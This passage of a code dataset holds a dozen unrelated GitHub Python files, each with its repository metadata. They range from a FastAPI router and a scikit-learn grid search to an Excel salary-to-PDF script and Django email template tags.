successfully\"}\n\n # If no matching document is found, raise a 404 Not Found exception\n raise HTTPException(status_code=404, detail=\"Partner not found\")\n\n except HTTPException as http_exception:\n raise http_exception\n except Exception as e:\n raise HTTPException(status_code=500, detail=f\"Terjadi kesalahan: {str(e)}\")\n\n## ASSETS ROUTER\n@asset_router.get(\"/url-media\")\nasync def url_media_partners():\n try:\n # Query Firestore to get all documents in \"partners\" collection with category \"media_partner\"\n query = db.collection(\"partners\").where(\"category\", \"==\", \"media_partner\").stream()\n\n media_partners = []\n\n for doc in query:\n media_partners.append(doc.to_dict())\n\n # Prepare the success response\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": media_partners\n }\n\n return response_data\n\n except Exception as e:\n # Prepare the error response\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n\n raise HTTPException(status_code=500, detail=response_data)\n\n# Modify the url_sponsors endpoint\n@asset_router.get(\"/url-sponsor\")\nasync def url_sponsors():\n try:\n # Query Firestore to get all documents in \"partners\" collection with category \"sponsor\"\n query = db.collection(\"partners\").where(\"category\", \"==\", \"sponsor\").stream()\n\n sponsors = []\n\n for doc in query:\n sponsors.append(doc.to_dict())\n\n # Prepare the success response\n response_data = {\n \"status_code\": 200,\n \"status\": \"success\",\n \"data\": sponsors\n }\n\n return response_data\n\n except Exception as e:\n # Prepare the error response\n response_data = {\n \"status_code\": 500,\n \"status\": \"failed\",\n \"message\": f\"Terjadi kesalahan: {str(e)}\"\n }\n\n raise HTTPException(status_code=500, detail=response_data)","repo_name":"reyshazni/icee2024-be","sub_path":"routes/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":14084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33915456337","text":"# 2D diffusion on a real 2D surface - initial release on a patch by either density or Boolean intersection of e.g. a sphere with a plane\n\n# Note that this example could use an outside library to do the Boolean intersection.\n# We might implement such functionality, but I suspect other libraries may be available.\n\n# Parameters to vary\niterations = 1000\nnum_A = 200\nsheet_size = 10\nrelease_radius = 2\n\n\n# Import the things needed\nimport pymcell as m\nimport random\nimport external_geometry_library as egl\n\n\n# Make a world\nsim = m.create_model()\n\n\n# Set current time and timestep\nsim.t = 0.0\nsim.dt = 1e-6\n\n\n# Add the standard iteration callback to capture molecule positions\nsim.iteration_callback_list.append ( callback=m.viz_output_callback, data={['ALL']}, skip=0 )\n\n\n# Create the species and add to simulation\nmol_A = m.create_species(name=\"A\",dc=1e-5,type=m.SURFACE_TYPE) # Volume mol by default\nsim.species_list.append(mol_A)\n\n\n# Create a sheet at z=0 (the old-fashioned way)\npoints = [\n [ -1, -1, 0 ],\n [ 1, -1, 0 ],\n [ 1, 1, 0 ],\n [ -1, 1, 0 ] ]\n\nfaces = [\n [ 0, 1, 2 ],\n [ 0, 2, 3 ] ]\n\n# Scale the points in the x,y dimension\nfor p in points:\n p[0] *= sheet_size\n p[1] *= sheet_size\n\nrelease_points = []\n\nuse_outside_library = False\nif use_outside_library:\n egl_plane = egl.create_object_from_points_and_faces ( points, faces )\n egl_sphere = egl.create_sphere ( center=(0,0,0), radius=release_radius )\n (egl_point_list, egl_faces_inside, egl_faces_outside) = egl.subdivide_surface_with_solid ( egl_plane, egl_sphere )\n # Each element of the faces arrays is a list of 3 vertices in the point list\n\n final_plane = m.create_object_from_points_faces ( name=\"entire_plane\", points=egl_point_list, faces=egl_faces_inside+egl_faces_outside )\n release_surf = m.create_surface_from_faces ( name=\"rel_surf\", obj=final_plane, faces = egl_faces_inside )\n\n sim.object_list.append ( final_plane )\n\n release_points = []\n for i in range(num_A):\n p = m.random_point_on_face_list ( release_surf )\n release_points.append ( p )\nelse:\n while len(release_points) < num_A:\n x = random.uniform(-sheet_size, sheet_size)\n y = random.uniform(-sheet_size, sheet_size)\n if ((x*x)+(y*y)) < (release_radius*release_radius):\n release_points.append ( [x,y,0] )\n\n# Release the molecules\nsim.add_molecules_at_points ( mol=mol_A, points=release_points ) # Add by reference, could also use name='A'\n\n\n# Run the simulation\n\nsim.run(iterations=iterations)\n\n","repo_name":"mcellteam/libMCellPP","sub_path":"api_prototype/bob/test_4_2d_diffusion.py","file_name":"test_4_2d_diffusion.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"38777970362","text":"import numpy as np \nimport cv2\nimport argparse\nimport matplotlib.pyplot as plt\n\n#construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument('-i', '--image', required = True, help = \"Path to the image\")\nap.add_argument(\"-s\", \"--shrink\", action=\"store_true\")\nargs = vars(ap.parse_args())\n\n#Load the image and clone it for output\nimg = cv2.imread(args['image'], cv2.IMREAD_ANYCOLOR | cv2.IMREAD_ANYDEPTH)\nif args[\"shrink\"]:\n\timg = cv2.resize(img, (0,0), fx=.25, fy=.25)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n\n#The canney algorithm only takes 8-bit images as input, need to convert if the image is in 16bit\nif(gray.dtype == \"uint16\"):\n\tgray = (gray/256).astype('uint8')\n\n\nedges = cv2.Canny(gray, 10, 20)\n#adjust low and high hysteresis threshold - to test out what CHT will do (canny computerphile vid)\n\n\nplt.imshow(cv2.cvtColor(edges, cv2.COLOR_GRAY2RGB))\nplt.show()\n\n'''\ncv2.imshow(\"canny\", np.hstack([gray, edges]))\ncv2.waitKey(0)\n'''","repo_name":"mgharbi/computational-periscopy","sub_path":"testprograms/canny.py","file_name":"canny.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"19693151955","text":"import unittest\n\nfrom pytma.POSTag import POStag\n\nclass TestPOSTag(unittest.TestCase):\n def test_pos_tag(self):\n test_text = u\"It was now reading the sign that said Privet Drive — no, looking at the sign; \" \\\n \"cats couldn't read maps or signs.He didn't see the owls swooping past in broad daylight, \" \\\n \"though people down in the street did; they pointed and gazed open-mouthed as owl after \" \\\n \"owl sped overhead\"\n\n pos = POStag(test_text, DEBUG=True)\n\n dict = pos.transform()\n\n for k in dict:\n print(k, dict[k])\n\n print(\"Done\")\n\n self.assertEqual(dict['It'], 'n')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"aloidia-solutions/nlp-modelling","sub_path":"pytma/tests/test_POSTag.py","file_name":"test_POSTag.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35911032768","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom termcolor import colored, cprint\r\nimport time\r\nfrom sklearn.model_selection import learning_curve\r\n\r\n#\r\n# 'max_leaf_nodes':[2, 3, 4, 5, 6, 7, 8, 9, 10],\r\n#'min_samples_leaf':[50,52,55,57,58,60]\r\n#max-depth 7 and max_leaf_nodes 30\r\n#'max_depth': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10],\r\n#max-depth 5\r\n#max_depth 5, min_samples lead 30\r\n\r\ngrid_param = {\r\n 'max_depth':[350,360,370,380,390,400,410,420],\r\n 'max_leaf_nodes':[300,320,340,360,380,400,420,440,460]\r\n}\r\n#==== Uncomment to Run Diabetes ======\r\n# dataset = pd.read_csv(\"./csv_result-diabetes.csv\")\r\n# X = dataset.drop('class', axis=1)\r\n# y = dataset['class']\r\n\r\n#====Uncomment to Run Wine =========\r\ndataset = pd.read_csv(\"./winequality-red.csv\")\r\nX = dataset.drop('quality', axis=1)\r\ny = dataset['quality']\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\r\n# Scale data so it is uniformly evaluated\r\nscaler = StandardScaler()\r\nscaler.fit(X_train)\r\nX_train = scaler.transform(X_train)\r\nX_test = scaler.transform(X_test)\r\ndecision_tree = DecisionTreeClassifier()\r\nstart_time = time.time()\r\ngd_sr = GridSearchCV(estimator=decision_tree, param_grid=grid_param, scoring='accuracy', cv=3, n_jobs=-1)\r\ngd_sr.fit(X_train, y_train.values.ravel())\r\n\r\n# Print out helpful data from the grid search\r\ncprint(\"Training time: {0} \\n\".format(time.time() - start_time), \"blue\")\r\nbest_params = gd_sr.best_params_\r\nbest_result = gd_sr.best_score_\r\ncprint(\"best parameters were: {0}\".format(best_params), 'red')\r\ncprint(\"best results were: {0}\".format(best_result), 'red')\r\n\r\n# Make and run the classifier with the ideal parameters\r\ndepth = best_params[\"max_depth\"]\r\ncrit = best_params['max_leaf_nodes']\r\ndecision_tree = DecisionTreeClassifier(max_leaf_nodes=crit,max_depth=depth)\r\ndecision_tree =decision_tree.fit(X_train, y_train.values.ravel())\r\npredicted = decision_tree.predict(X_test)\r\nprint(accuracy_score(y_test, predicted))\r\ndecision_tree = DecisionTreeClassifier()\r\ndecision_tree = decision_tree.fit(X_train, y_train.values.ravel())\r\npredicted = decision_tree.predict(X_test)\r\nprint(accuracy_score(y_test, predicted))\r\niArray = []\r\naccuracy = []\r\nfor i in range(2,500):\r\n decision_tree = DecisionTreeClassifier(max_depth = i)\r\n decision_tree = decision_tree.fit(X_train, y_train.values.ravel())\r\n predicted = decision_tree.predict(X_test)\r\n iArray.append(i)\r\n accuracy.append(accuracy_score(y_test, predicted))\r\n print (\"i\")\r\n print (i)\r\n print (\"accuracy\")\r\n print(accuracy_score(y_test, predicted))\r\nplt.plot(iArray, accuracy, color='red', linestyle='solid', marker='x', markerfacecolor='red', markersize=5)\r\ntitle = \"Wine Quality\" + \": Accuracy vs. Maximum Depth- \" + 'Decision Tree'\r\nplt.title(title)\r\nplt.xlabel('Maximum Depth')\r\nplt.ylabel('Accuracy')\r\nplt.show()\r\n\r\n\r\n# #Curve\r\n# train_sizes, train_scores, test_scores = learning_curve(decision_tree, X, y, train_sizes=np.linspace(.05, .95, num=19), n_jobs=None)\r\n# train_scores_mean = np.mean(train_scores, axis=1)\r\n# test_scores_mean = np.mean(test_scores, axis=1)\r\n# plt.figure(figsize=(12, 6))\r\n# plt.plot(train_sizes, 1- train_scores_mean, color='red', linestyle='solid', marker='x', markerfacecolor='red', markersize=5)\r\n# plt.plot(train_sizes, 1- test_scores_mean, color='green', linestyle='solid', marker='x', markerfacecolor='green', markersize=5)\r\n# title = \"Wine Quality\" + \": Training Error and Testing Error vs. Training size - \" + 'Decision Tree'\r\n# plt.title(title)\r\n# plt.xlabel('Training size')\r\n# plt.ylabel('Error Rate')\r\n# plt.show()","repo_name":"abbylacjames/Machine_Learning_CS4641","sub_path":"decision_trees.py","file_name":"decision_trees.py","file_ext":"py","file_size_in_byte":3874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"1427573069","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Functions in GenSVM that are taken from Scikit-Learn\n\nThe GenSVM Python package is designed to work in the same way as Scikit-Learn \nclassifiers, as this makes it easier for people familiar with Scikit-Learn to \nuse GenSVM. As such, some of the functionality of the GenSVM Python package is \nsimilar to code in the Scikit-Learn package (such as formatting the grid search \nresults). To keep a clean separation between code from Scikit-Learn (which is \nlicensed under the BSD license) and code written by the author(s) of the GenSVM \npackage, the code from scikit-learn is placed here in explicit self-contained \nfunctions. To comply with clause a of the BSD license, it is repeated below as \nrequired.\n\n\"\"\"\n\nimport numbers\nimport numpy as np\nimport warnings\n\nfrom collections import defaultdict\nfrom contextlib import suppress\nfrom functools import partial\n\nfrom sklearn.metrics._scorer import _MultimetricScorer\nfrom sklearn.metrics._scorer import check_scoring\n\nfrom .core import GenSVM\nfrom .util import get_ranks\n\n\n# BEGIN SCIKIT LEARN CODE\n\n\"\"\"\n\nNew BSD License\n\nCopyright (c) 2007–2017 The scikit-learn developers.\nAll rights reserved.\n\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n a. Redistributions of source code must retain the above copyright notice,\n this list of conditions and the following disclaimer.\n b. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n c. Neither the name of the Scikit-learn Developers nor the names of\n its contributors may be used to endorse or promote products\n derived from this software without specific prior written\n permission.\n\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\nARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR\nANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\nLIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\nOUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\nDAMAGE.\n\n\"\"\"\n\nfrom numpy.ma import MaskedArray\n\nfrom sklearn.exceptions import NotFittedError\nfrom sklearn.model_selection._validation import (\n _normalize_score_results,\n _aggregate_score_dicts,\n)\n\n\ndef _skl_format_cv_results(\n out,\n return_train_score,\n candidate_params,\n n_candidates,\n n_splits,\n scorers,\n iid,\n):\n\n out = _aggregate_score_dicts(out)\n\n results = dict()\n\n def _store(key_name, array, weights=None, splits=False, rank=False):\n \"\"\"A small helper to store the scores/times to the cv_results_\"\"\"\n # When iterated first by splits, then by parameters\n # We want `array` to have `n_candidates` rows and `n_splits` cols.\n array = np.array(array, dtype=np.float64).reshape(\n n_candidates, n_splits\n )\n if splits:\n for split_i in range(n_splits):\n # Uses closure to alter the results\n results[\"split%d_%s\" % (split_i, key_name)] = array[:, split_i]\n\n array_means = np.average(array, axis=1, weights=weights)\n results[\"mean_%s\" % key_name] = array_means\n\n if key_name.startswith((\"train_\", \"test_\")) and np.any(\n ~np.isfinite(array_means)\n ):\n warnings.warn(\n f\"One or more of the {key_name.split('_')[0]} scores \"\n f\"are non-finite: {array_means}\",\n category=UserWarning,\n )\n\n # Weighted std is not directly available in numpy\n array_stds = np.sqrt(\n np.average(\n (array - array_means[:, np.newaxis]) ** 2,\n axis=1,\n weights=weights,\n )\n )\n results[\"std_%s\" % key_name] = array_stds\n\n if rank:\n results[\"rank_%s\" % key_name] = np.asarray(\n get_ranks(-array_means), dtype=np.int32\n )\n\n _store(\"fit_time\", out[\"fit_time\"])\n _store(\"score_time\", out[\"score_time\"])\n # Use one MaskedArray and mask all the places where the param is not\n # applicable for that candidate. Use defaultdict as each candidate may\n # not contain all the params\n param_results = defaultdict(\n partial(MaskedArray, np.empty(n_candidates), mask=True, dtype=object)\n )\n\n for cand_i, params in enumerate(candidate_params):\n for name, value in params.items():\n # An all masked empty array gets created for the key\n # `\"param_%s\" % name` at the first occurence of `name`.\n # Setting the value at an index also unmasks that index\n param_results[\"param_%s\" % name][cand_i] = value\n\n results.update(param_results)\n # Store a list of param dicts at the key 'params'\n results[\"params\"] = candidate_params\n\n test_scores_dict = _normalize_score_results(out[\"test_scores\"])\n if return_train_score:\n train_scores_dict = _normalize_score_results(out[\"train_scores\"])\n\n for scorer_name in test_scores_dict:\n # Computed the (weighted) mean and std for test scores alone\n _store(\n \"test_%s\" % scorer_name,\n test_scores_dict[scorer_name],\n splits=True,\n rank=True,\n weights=None,\n )\n if return_train_score:\n _store(\n \"train_%s\" % scorer_name,\n train_scores_dict[scorer_name],\n splits=True,\n )\n return results\n\n\ndef _skl_check_is_fitted(estimator, method_name, refit):\n if not refit:\n raise NotFittedError(\n \"This %s instance was initialized \"\n \"with refit=False. %s is \"\n \"available only after refitting on the best \"\n \"parameters. You can refit an estimator \"\n \"manually using the ``best_parameters_`` \"\n \"attribute\" % (type(estimator).__name__, method_name)\n )\n else:\n if not hasattr(estimator, \"best_estimator_\"):\n raise NotFittedError(\n \"This %s instance is not fitted yet. Call \"\n \"'fit' with appropriate arguments before using this \"\n \"estimator.\" % type(estimator).__name__\n )\n\n\ndef _skl_grid_score(X, y, scorer_, best_estimator_, refit, multimetric_):\n \"\"\"Returns the score on the given data, if the estimator has been\n refit.\n\n This uses the score defined by ``scoring`` where provided, and the\n ``best_estimator_.score`` method otherwise.\n\n Parameters\n ----------\n X : array-like, shape = [n_samples, n_features]\n Input data, where n_samples is the number of samples and\n n_features is the number of features.\n\n y : array-like, shape = [n_samples] or [n_samples, n_output], optional\n Target relative to X for classification or regression;\n None for unsupervised learning.\n\n Returns\n -------\n score : float\n \"\"\"\n if scorer_ is None:\n raise ValueError(\n \"No score function explicitly defined, \"\n \"and the estimator doesn't provide one %s\" % best_estimator_\n )\n score = scorer_[refit] if multimetric_ else scorer_\n return score(best_estimator_, X, y)\n\n\ndef _skl_score(estimator, X_test, y_test, scorer):\n \"\"\"Compute the score(s) of an estimator on a given test set.\n Will return a dict of floats if `scorer` is a dict, otherwise a single\n float is returned.\n \"\"\"\n if isinstance(scorer, dict):\n # will cache method calls if needed. scorer() returns a dict\n scorer = _MultimetricScorer(**scorer)\n if y_test is None:\n scores = scorer(estimator, X_test)\n else:\n scores = scorer(estimator, X_test, y_test)\n\n error_msg = (\n \"scoring must return a number, got %s (%s) \" \"instead. (scorer=%s)\"\n )\n if isinstance(scores, dict):\n for name, score in scores.items():\n if hasattr(score, \"item\"):\n with suppress(ValueError):\n # e.g. unwrap memmapped scalars\n score = score.item()\n if not isinstance(score, numbers.Number):\n raise ValueError(error_msg % (score, type(score), name))\n scores[name] = score\n else: # scalar\n if hasattr(scores, \"item\"):\n with suppress(ValueError):\n # e.g. unwrap memmapped scalars\n scores = scores.item()\n if not isinstance(scores, numbers.Number):\n raise ValueError(error_msg % (scores, type(scores), scorer))\n return scores\n\n\ndef _skl_check_refit_for_multimetric(self, scores):\n \"\"\"Check `refit` is compatible with `scores` is valid\"\"\"\n multimetric_refit_msg = (\n \"For multi-metric scoring, the parameter refit must be set to a \"\n \"scorer key or a callable to refit an estimator with the best \"\n \"parameter setting on the whole data and make the best_* \"\n \"attributes available for that metric. If this is not needed, \"\n f\"refit should be set to False explicitly. {self.refit!r} was \"\n \"passed.\"\n )\n\n valid_refit_dict = isinstance(self.refit, str) and self.refit in scores\n\n if (\n self.refit is not False\n and not valid_refit_dict\n and not callable(self.refit)\n ):\n raise ValueError(multimetric_refit_msg)\n","repo_name":"GjjvdBurg/PyGenSVM","sub_path":"gensvm/sklearn_util.py","file_name":"sklearn_util.py","file_ext":"py","file_size_in_byte":9857,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"37868139641","text":"import itertools\nimport re\nimport time\n\nfrom collections import Counter\n\nclass cube:\n\n def __init__(self, filename):\n \"\"\" self.cube is a list of (x, y, z) tuples which are active\n \"\"\"\n self.cube = []\n values = []\n self.types = {}\n self.tickets = []\n f = open(filename, 'r')\n row = 0\n for line in f:\n values.append(line.strip())\n \n self.width = len(values[0])\n self.height = len(values)\n self.depth = 0\n print(f\"input: {values} dimensions ({self.width} x {self.height} x {self.depth})\")\n \n\n self.cube.append(values)\n\n self._shift(1)\n self.printCube()\n\n def _shift(self, d=1):\n \"\"\" Shifts a cube (+d, +d, +d) in 3-space\n \"\"\"\n newwidth = self.width+d\n newHeight = self.height+d\n newDepth = self.depth+d\n newcube = [[''.join(['.' for x in range(self.width+d)]) for y in range(self.height+d)] for z in range(self.depth+d)]\n \n print(newcube)\n newrow = ''.join(['.']*self.width)\n newlines = [newrow]*self.height\n\n\n\n def printCube(self):\n print(f\"Cube has \")\n for d in range(self.depth):\n for l in self.cube[d]:\n print(l)\n if d < self.depth:\n print(\"\")\n\n\nclass machine:\n\n def __init__(self, filename):\n self.input = cube(filename)\n \n def runProgram(self):\n result = 0\n for myticket in self.input.tickets:\n result += self.input.testvalid(myticket)\n return(result)\n\n\ninput = cube('testinput.txt')\nprint(\"-----------------\")\n\n# myMachine = machine('testinput.txt')\n# finalState = myMachine.runProgram()\n# print(f\"Final State: {finalState}\")\n\n# myMachine = machine('input.txt')\n# finalState = myMachine.runProgram()\n# print(f\"Final State: {finalState}\")\n","repo_name":"chipmonkey/adventofcode2020","sub_path":"day17/try1.py","file_name":"try1.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24153352188","text":"import transformations as tr\n\n# Function that returns a sentence depending on the value of the level in the JSON file\ndef level(level,language,proba_error):\n fl_type = level[\"type\"]\n value = tr.transform_numbers(level[\"valeur\"],language,proba_error)\n\n if language == \"FR\":\n switcher_level_FR = {\n \"descente\" : \"Descendons niveau {}. . \".format(value),\n \"montee\" : \"Mon tons niveau {}. .\".format(value),\n \"fixe\" : \"Maintenons niveau {}. . \".format(value),\n }\n return switcher_level_FR[fl_type] \n elif language == \"EN\":\n switcher_level_EN = {\n \"descente\" : \"Descending level {}. . \".format(value),\n \"montee\" : \"Climbing level {}. . \".format(value),\n \"fixe\" : \"Maintaining level {}. . \".format(value),\n }\n return switcher_level_EN[fl_type] ","repo_name":"bongtzeyaw/text-to-speech","sub_path":"src/build_sentence/say_level.py","file_name":"say_level.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34878177682","text":"from pathlib import Path\n\nfrom ..ReSQDataset import (\n TEXT_ANS_CHOICES,\n PREFIX_TO_CHOICES,\n SUFFIX_TO_CHOICES,\n)\n\nfrom ... import FewShotDemoGenerator\n\n\nclass ReSQDemoGenerator(FewShotDemoGenerator):\n def __init__(\n self,\n demo_file=\"resq-demo.json\",\n demo_path=None,\n prefix_to_choices=PREFIX_TO_CHOICES,\n suffix_to_choices=SUFFIX_TO_CHOICES,\n sent_join_char=\" \", # space or \\n\n incl_ans_choices=True,\n random_state=42,\n ):\n if demo_path is None:\n demo_path = Path(__file__).parent\n\n super().__init__(\n demo_file=demo_file,\n demo_path=demo_path,\n text_ans_choices=TEXT_ANS_CHOICES,\n prefix_to_choices=prefix_to_choices,\n suffix_to_choices=suffix_to_choices,\n sent_join_char=sent_join_char,\n incl_ans_choices=incl_ans_choices,\n random_state=random_state,\n )\n\n def _get_demo_id(self, data, fp):\n # e.g. fp = dev_resq_reas_chain.json\n file_name_meta = fp.stem.split(\"_\")\n split_type = file_name_meta[0]\n demo_id = f\"resq|{split_type}|{data['name']}\"\n return demo_id\n\n def _preprocess_demo(self, data, demo_id):\n demo = []\n for i, d in enumerate(data[\"data\"]):\n story = d[\"story\"]\n context_steps = len(story)\n\n context = \"\"\n for c in story:\n # unfortunately capitalize lowers the intermediate uppercases\n if not c[0].isupper():\n c = c[0].upper() + c[1:]\n c = c.replace(\" ,\", \",\").replace(\" .\", \".\")\n c = c.replace(\"( \", \"(\").replace(\" )\", \")\")\n if c[-1] != \".\":\n c += \".\"\n context += self.sent_join_char + c\n context = context.strip()\n\n for j, q in enumerate(d[\"questions\"]):\n if q.get(\"reasoning\"):\n cur_demo = {\"id\": f\"{demo_id}|{i}|{j}|{d['Context_id']}\"}\n\n cur_demo[\"context\"] = context\n cur_demo[\"context_steps\"] = context_steps\n\n cur_demo[\"question\"] = q[\"question\"]\n cur_demo[\"answer\"] = q[\"answer\"][0]\n\n cur_demo[\"reasoning\"] = self.sent_join_char.join(q[\"reasoning\"])\n cur_demo[\"reasoning_steps\"] = len(q[\"reasoning\"])\n\n demo.append(cur_demo)\n\n return demo\n","repo_name":"imbesat-rizvi/spatial_bench","sub_path":"data/ReSQ/reasoning_chain/ReSQDemoGenerator.py","file_name":"ReSQDemoGenerator.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"35029014112","text":"#for a single file at a time\n\nimport openpyxl #library to interact with python\nfrom win32com import client #for converting the final result to a pdf\npath = input(\"Enter the path of the Excel file\") #get path for the salary structure excel \npathout = input(\"Enter the destination path for the pdf file\") \ncell = input(\"Enter the cell address for ctc\") #get the cell address for the cell to eter ctc\nwb=openpyxl.load_workbook(path) #opening the excel file\nsh=wb['Sheet1'] #select the sheet\n\nctc=input(\"enter the ctc\") #getting value for ctc \nwb[cell]=ctc #inserting the ctc value into the formulated excel\nwb.save() #save the ecxel with the new ctc value\n\nexcel = client.Dispatch(\"Excel.Application\") #open excel\n \nexcel.Interactive = False\nexcel.Visible = False\nsheets = excel.Workbooks.Open(path) \nwork_sheets = sheets.Worksheets[0] #read excel file\n\nwork_sheets.ExportAsFixedFormat(0, pathout) #convert to pdf and save at the path mentioned for output\nwork_sheet.close() #close excel file\n","repo_name":"bimalroyv/salary-structure-creation","sub_path":"draft1.py","file_name":"draft1.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4139039331","text":"#https://leetcode-cn.com/problems/keyboard-row/\r\n\r\n\"\"\"\r\n给定一个单词列表,只返回可以使用在键盘同一行的字母打印出来的单词。键盘如下图所示。\r\n示例:\r\n输入: [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]\r\n输出: [\"Alaska\", \"Dad\"]\r\n\"\"\"\r\n\r\nclass Solution:\r\n def findWords(self, words: list):\r\n res = []\r\n first = [\"q\",\"w\",\"e\",\"r\",\"t\",\"y\",\"u\",\"i\",\"o\",\"p\",\"Q\",\"W\",\"E\",\"R\",\"T\",\"Y\",\"U\",\"I\",\"O\",\"P\"]\r\n second = [\"a\",\"s\",\"d\",\"f\",\"g\",\"h\",\"j\",\"k\",\"l\",\"A\",\"S\",\"D\",\"F\",\"G\",\"H\",\"J\",\"K\",\"L\"]\r\n third = [\"z\",\"x\",\"c\",\"v\",\"b\",\"n\",\"m\",\"Z\",\"X\",\"C\",\"V\",\"B\",\"N\",\"M\"]\r\n for i in range(len(words)):\r\n tmp = []\r\n for w in words[i]:\r\n if w in first:\r\n tmp.append(1)\r\n elif w in second:\r\n tmp.append(2)\r\n else:\r\n tmp.append(3)\r\n if len(set(tmp)) == 1:\r\n res.append(words[i])\r\n return res\r\n\r\n\r\nif __name__ == \"__main__\":\r\n words = [\"Hello\", \"Alaska\", \"Dad\", \"Peace\"]\r\n solution = Solution()\r\n result = solution.findWords(words)\r\n print(result)\r\n\r\n\r\n","repo_name":"alpharol/algorithm_python3","sub_path":"leetcode/0401-0500/0500.键盘行.py","file_name":"0500.键盘行.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"17193625470","text":"import datetime\r\nimport LatLon\r\nfrom dateutil import tz\r\n\r\nfrom django.contrib.auth.models import User\r\nfrom django import template\r\nfrom django.core.exceptions import ObjectDoesNotExist\r\nfrom django.conf import settings\r\nfrom django.utils.safestring import mark_safe\r\n\r\nfrom bfrs.models import Bushfire\r\nfrom bfrs import utils\r\n\r\nregister = template.Library()\r\n\r\n\r\n@register.inclusion_tag('bfrs/email/bushfire_details.html',takes_context=True)\r\ndef bushfire_details(context,bushfire,*fields):\r\n context[\"bushfire_fields\"]=fields\r\n context[\"cur_bushfire\"] = bushfire\r\n\r\n return context\r\n\r\n@register.simple_tag(takes_context=True)\r\ndef email_debug(context):\r\n import ipdb;ipdb.set_trace()\r\n\r\n@register.simple_tag\r\ndef get_jsonproperty(bushfire,property_name,default_value=None):\r\n \"\"\"\r\n return property value\r\n \"\"\"\r\n if bushfire:\r\n try:\r\n return bushfire.properties.get(name=property_name).json_value\r\n except ObjectDoesNotExist:\r\n return default_value\r\n else:\r\n return default_value\r\n\r\n\r\nFIELD_MAPPING = {\r\n \"origin_point_geo\":\"origin_point\"\r\n}\r\n@register.filter(is_safe=True)\r\ndef field_label(field_name, bushfire=None):\r\n \"\"\"\r\n Return the label of model field\r\n \"\"\"\r\n field_name = FIELD_MAPPING.get(field_name) or field_name\r\n if bushfire:\r\n try:\r\n return bushfire._meta.get_field(field_name).verbose_name\r\n except:\r\n return field_name\r\n else:\r\n return field_name\r\n\r\n\r\n@register.simple_tag()\r\ndef field_value(field_name, bushfire=None, request=None, url_type=\"auto\",is_upper=None,external_email=False):\r\n \"\"\"\r\n Return the value of model field to dispay in the email\r\n \"\"\"\r\n if bushfire:\r\n try:\r\n if field_name == \"origin_point_geo\":\r\n return bushfire.origin_geo\r\n elif field_name == \"region\":\r\n if is_upper == True:\r\n return bushfire.region.name.upper()\r\n else:\r\n return bushfire.region.name\r\n elif field_name == \"district\":\r\n if is_upper == True:\r\n return bushfire.district.name.upper()\r\n else:\r\n return bushfire.district.name\r\n elif field_name == \"fire_number\":\r\n if request and not external_email:\r\n return mark_safe(\"{}\".format(utils.get_bushfire_url(request,bushfire,url_type),bushfire.fire_number))\r\n else:\r\n return bushfire.fire_number\r\n elif field_name == \"url_link\":\r\n return mark_safe(\"{0}\".format(utils.get_bushfire_url(request,bushfire,url_type)))\r\n elif field_name == 